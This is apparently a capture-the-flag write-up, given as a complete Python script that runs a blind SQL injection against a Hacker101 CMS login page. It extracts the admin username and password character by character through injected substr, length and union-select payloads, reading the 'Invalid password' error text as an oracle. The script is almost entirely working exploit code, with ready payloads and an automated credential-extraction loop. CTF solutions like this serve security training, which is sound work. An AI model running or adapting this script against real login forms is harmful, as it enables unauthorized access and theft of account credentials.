Hackerone CMS V2 Flag02

2020. 6. 29. 04:15 | 0x0B Web Hacking

import requests
import urllib3
import string # ascii_letters
import random
import sys

# Silences every urllib3 warning for the whole process.  That includes the
# InsecureRequestWarning that verify=False requests would raise over HTTPS.
urllib3.disable_warnings()

# Short alias used by every probe function in this file.
rp = requests.post
# Login endpoint the probes are sent to (presumably the challenge instance named
# in the page title).  The scheme is plain http, so the verify=False passed by
# the probe functions has no effect on these requests.
url ="http://35.227.24.107/b85e1bbddf/login"
# Candidate alphabet for bruteforce(): ASCII letters only, so digits and
# punctuation are never tested.
brute = string.ascii_letters
# Wider alternative that also covers digits:
#brute = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
# username : []
# password : []

# Values noted by the author, presumably from an earlier run of length():
#username length : 7
#password length : 9
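def substr_data(data,len,target):
    """Recover the value of column *target* one position at a time.

    For each position from 1 to ``int(len)`` the candidates in *data* are tried
    in order.  Each probe posts a username that closes the quoted value and
    ORs in ``substr(<target>,<position>,1)='<candidate>'``.  A reply containing
    "Invalid password" is read as the condition being true.  The only signal
    used is that difference in error text: a login handler that binds the
    username as a query parameter and answers every failure with one message
    would return the same page for every probe.

    Args:
        data: iterable of candidate characters to test at each position.
        len: number of positions to recover; anything ``int()`` accepts.
            The name shadows the builtin but is kept as part of the signature.
        target: column name interpolated into the probe.

    Returns:
        List of matched characters in position order.  The list is shorter
        than ``int(len)`` when some position matched no candidate.
    """
    total = int(len)
    valid = []
    print(f"{data}")

    for index in range(1, total + 1):
        for d in data:
            LOGIN_DATA = {
                'username' : f"' or substr({target},{index},1)='{d}' #",
                'password' : "1"
            }
            res = rp(url, data=LOGIN_DATA, verify=False)
            if "Invalid password" in res.text:
                print(f"good ! {d}")
                valid.append(d)
                # Restart the candidate list for the next position.  The
                # original kept iterating with an already-incremented index,
                # which could run past the requested length.
                break
        else:
            # No candidate matched this position.  The original `while` loop
            # never advanced here and retried the same probes forever.
            print(f"no candidate matched position {index}; stopping")
            break

    return valid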
def length(data):
    """Return the first n in 1..99 for which the login oracle confirms ``length(data) = n``.

    Each probe posts a username that closes the quoted value and ORs in
    ``length(<data>)=<n>``; a reply containing "Invalid password" is taken as
    the condition being true.

    NOTE(review): when no probe succeeds the function still returns 99, the
    last value tried, so a failed search cannot be told apart from a
    99-character value.
    """
    probe_len = 0
    for probe_len in range(1, 100):
        payload = {
            'username': f"' or length({data})={probe_len}#",
            'password': "1",
        }
        reply = rp(url, data=payload, verify=False)
        if "Invalid password" in reply.text:
            return probe_len
    # Range exhausted without a hit: falls through with the last value (99).
    return probe_len

def bruteforce(data):
    """Return the characters of ``brute`` that the oracle reports as present in column *data*.

    One request is sent per character.  The probe selects *data* from
    ``admins`` where the value is ``LIKE '%<ch>%'``, and a reply containing
    "Invalid password" is taken to mean at least one row matched.  Only the
    set of characters is learned here, not their positions or how often each
    occurs.
    """
    def occurs(ch):
        # One probe: does any row's value contain this character?
        payload = {
            'username': f"' union select {data} from admins where {data} LIKE '%{ch}%' and '1'='1' -- ",
            'password': '1',
        }
        reply = rp(url, data=payload, verify=False)
        return "Invalid password" in reply.text

    return [ch for ch in brute if occurs(ch)]
if __name__ == '__main__':
    print("[+] Hackerone CMS V2 Flag 02")

    # Stage 1, kept for reference only.  It measures both column lengths and
    # collects the set of letters each value contains.  Its results are
    # hard-coded below, so it is not executed.
    #
    #     id_len = length("username")
    #     print(f"username length = {id_len}")
    #     pw_len = length("password")
    #     print(f"password length = {pw_len}")
    #     user_data = bruteforce("username")
    #     print(f"username list = {user_data}")
    #     pass_data = bruteforce("password")
    #     print(f"password list = {pass_data}")

    # Values recorded by the author.
    username_len = '7'
    password_len = '9'
    username_letters = ['d', 'e', 'l', 'r', 'v']
    password_letters = ['a', 'c', 'e', 'i', 'k', 'm', 'n', 'z']

    # Stage 2: order the known letters position by position.
    recovered_user = substr_data(username_letters, username_len, "username")
    print(f"real username = {''.join(recovered_user)}")
    recovered_pwd = substr_data(password_letters, password_len, "password")
    print(f"real password = {''.join(recovered_pwd)}")
